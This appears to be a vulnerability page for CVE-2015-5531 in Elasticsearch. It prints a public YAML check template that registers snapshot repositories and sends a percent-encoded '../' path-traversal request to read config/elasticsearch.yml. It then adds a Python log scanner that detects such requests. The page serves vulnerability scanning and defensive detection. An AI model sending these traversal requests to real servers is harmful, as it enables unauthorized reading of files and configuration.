CVE-2015-5531: Elasticsearch CVE-2015-5531

Date: 2025-08-01 | Affected software: Elasticsearch | PoC: public

Vulnerability description

Elasticsearch before 1.4.4 allows remote attackers to read arbitrary files via a crafted request to the head plugin.

PoC code [public]

id: CVE-2015-5531

info:
  name: Elasticsearch CVE-2015-5531
  author: ha9worm
  severity: medium
  description: |-
    Elasticsearch before 1.4.4 allows remote attackers to read arbitrary files via a crafted request to the head plugin.
  reference:
    - https://www.elastic.co/community/security
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
  tags: cve,cve2015,elasticsearch,fileread
  created: 2023/07/13

set:
  r1: randomLowercase(4)
rules:
  # r0: register a filesystem ("fs") snapshot repository under a random name
  r0:
    request:
      method: PUT
      path: /_snapshot/{{r1}}
      body: |-
        {
            "type": "fs",
            "settings":{
                "location": "/usr/share/elasticsearch/repo/{{r1}}"
            }
        }
      follow_redirects: true
    expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
  # r1: register a second repository located inside the first one
  r1:
    request:
      method: PUT
      path: /_snapshot/{{r1}}2
      body: |-
        {
            "type": "fs",
            "settings":{
                "location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
            }
        }
      follow_redirects: true
    expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
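  # r2: request a snapshot name containing encoded "../" segments; a match is
  # HTTP 400 with an ElasticsearchParseException in the JSON error body
  r2: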
    request:
      method: GET
      path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
      follow_redirects: true
    expression: response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
expression: r0() && r1() && r2()
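
A defender-side check for the request pattern in rule r2 above, as an added example that is not part of the original template: it scans HTTP access-log lines for `/_snapshot/` requests whose path contains a `..` segment after percent-decoding. It assumes a reverse proxy in front of Elasticsearch writes combined-format access logs; the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "PUT /_snapshot/abcd HTTP/1.1" 200 21
10.0.0.5 - - [01/Aug/2025:10:00:02 +0000] "PUT /_snapshot/abcd2 HTTP/1.1" 200 21
10.0.0.5 - - [01/Aug/2025:10:00:03 +0000] "GET /_snapshot/abcd/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml HTTP/1.1" 400 310
10.0.0.9 - - [01/Aug/2025:10:05:00 +0000] "GET /_snapshot/nightly/snap_2025_08_01 HTTP/1.1" 200 512
10.0.0.9 - - [01/Aug/2025:10:06:00 +0000] "GET /_snapshot/nightly/a%252f..%252fb HTTP/1.1" 400 120
"""

# Assumed log layout: client IP first, quoted request line, then status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252f) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_snapshot_traversal(path):
    """True if a /_snapshot/ request path has a '..' segment after decoding."""
    decoded = fully_decode(path.split("?", 1)[0]).replace("\\", "/")
    if not decoded.startswith("/_snapshot/"):
        return False
    return ".." in decoded.split("/")

def find_traversal_requests(log_text):
    """Return (ip, method, raw_path, status) for each suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_snapshot_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("method"),
                         m.group("path"), int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded path rather than on the literal `%2f..%2f` string keeps the check effective against mixed-case or double-encoded separators.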
